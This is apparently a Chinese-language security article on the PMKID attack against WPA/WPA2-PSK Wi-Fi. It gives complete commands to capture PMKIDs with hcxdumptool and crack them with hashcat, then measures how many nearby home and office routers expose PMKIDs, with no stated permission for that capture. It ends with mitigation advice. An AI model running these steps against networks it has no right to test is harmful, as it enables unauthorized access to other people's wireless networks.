在2018年8月4日,一位研究员在hashcat论坛中发布了一篇帖子,表示他研究WPA3协议密码破解方法的过程中,发现了一个针对WPA/WPA2协议密码破解的新方法,使用PMKID(the Pairwise Master Key Identifier ,成对主密钥标识符)来破解无线密码。
在之前的方法中,攻击者需要捕获用户连接路由器时的完整握手包。而新的方法可以在没有客户端的情况下,向AP发送请求来获取PMKID以用于破解。
在作者的文章中表示该攻击适用于所有支持并开启漫游功能(Roaming)的无线网络,但他也并不清楚会对多少路由器有效。那么实际的影响范围到底如何呢,于是有了本文。
1. 准备测试环境
笔者使用了最新的Kali Linux发行版,支持Monitor模式的TP-LINK TL-WN722N(芯片组Atheros AR9271)。进行该实验还需要安装:
hcxtools v4.2.0或更高版本
apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
git clone https://github.com/ZerBea/hcxtools
cd hcxtools
make
make install
hcxdumptool v4.2.0或更高版本
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
make
make install
hashcat v4.2.0或更高版本
撰写本书时,kali仓库中的hashcat版本为4.1,同样需要手动安装更高版本的hashcat。
wget https://hashcat.net/files/hashcat-4.2.1.7z
7z x hashcat-4.2.1.7z
2. 实际测试
使用hcxdumptool捕获PMKID
ifconfig wlan0 down
iwconfig wlan0 mode monitor
iwconfig wlan0 up
hcxdumptool -o test.pcapng -i wlan0 --enable_status=1
当有如下显示时,表明获取到PMKID
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
原作者建议最多运行hcxdumptool10分钟就可以获取到周边所有能获取的PMKID了。
使用hcxpcaptool将pcapng格式转换为hashcat可使用的格式
hcxpcaptool -z test.16800 test.pcapng
执行后的效果如下图,在底部会显示捕获到的PMKID数量。
打开我们生成的16800格式的文件,如下图所示的格式,每一行由星号分成4块,分别是:PMKID、AP的MAC地址、客户端的MAC地址、ESSID。
使用hashcat进行爆破:
cd hashcat-4.2.1
./hashcat64.bin -m 16800 test.16800 -a 0 -w 3 pass.dict
-a 0 指定字典破解模式
pass.dict为字典文件
一旦有破解成功将有类似显示:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!
除了16800外,作者还表示支持预先计算散列表的方式168001。
暴力破解的工作原理是猜测明文值对其进行加密,然后将加密后的值与捕获到的密码散列值进行比较。如果比较失败说明猜测错误,再换下一个猜测反复进行上述过程。可以看到大部分的耗时都花在了对猜测的加密上。
预先计算散列表是由猜测加密后的密文组成的。有了预先计算的散列表,破解工具只需读取预先计算的散列表然后与密码散列值进行比较,这极大地提高了破解效率。相应的缺点是散列文件可能会非常大。在WPA-PSK的例子中,散列不仅包含了预共享密钥,还包含了SSID,这意味着即使两个无线网络密钥相同,但因为SSID不同就会导致散列不同。所以对于WPA-PSK,我们需要提前针对指定的SSID生成预先散列。
比如在 http://rainbowtables.shmoo.com/ 上可以找到一个由最常见的1000个 SSID和 100万密码制作而成的,40G大小的预先计算散列表。
3.影响评估
PMKID主要用于多个AP间的快速漫游,主要被使用在企业级无线网络环境中(WPA-Enterprise),但实际上这种攻击方式对于802.1X认证类型的热点是无效的,因为PMK值是在连接的时候针对每个客户端动态生成。而在WPA-PSK所广泛使用的家庭、小型办公网络中,PMKID往往是没有意义的,因为大多数环境只有一台AP。这也意味着大部分家用级路由器很可能并不支持漫游功能。
为了测试较为真实的影响范围,于是我在家庭和办公两个常见的环境进行了测试。测试思路如下:
1.使用wifite等工具,扫描周边存在热点5分钟,记录总量。
2.使用hcxdumptool抓获尝试PMKID值10分钟。
3.整理分析受影响热点的分布情况及特征,得出结论。
3.1 家庭环境
普通的小区住房,每家基本都会有路由器。5分钟捕获到108个热点,如下图:
hcxdumptool工具运行10分钟捕获只捕获到2条PMKID,一台为我自己的斐讯K2P,一台为华为B315 4G路由器。
可以看到,在该家庭环境中,受影响比例不到2%。
3.2 办公环境
在办公环境中,热点虽然也有很多,但分布在不同的楼层,在我网卡的接收范围内5分钟捕获到74个热点。
hcxdumptool工具运行10分钟捕获捕获到4条PMKID,排除掉其中2个802.1X认证的热点,剩余的一个为Tenda AC18 1900M,另一台是来自AskeyCom的路由器。在该办公环境中,受影响比例不到3%。
通过在这两个不算严密的实验中能发现,受该攻击影响的都来自于支持802.11AC等的中高端路由器(大概400以上)。
3.3 测试结论
最后,对于利用PMKID破解PSK的新攻击方式,我做出如下总结:
1.该攻击方式并没有明显降低攻击WPA/WPA2网络的难度,依然需要字典式进行暴力破解,只是允许在无客户端情况下进行。
2.该攻击只对WPA-PSK/WPA2-PSK有效,对企业级802.1X认证热点(WPA-Enterprise)无效。
3.大部分低端家用级路由器由于不支持漫游特性,对该攻击免疫;少部分中高端路由器(往往支持802.11AC)可能受影响,用不上就关掉吧(如果可以的话)。
4.对于用户:依然是提高无线密码复杂度,警惕热点密码分享APP。
5.对于路由器厂商:对WPA-PSK考虑是否有支持漫游特性的必要,或者增加开关。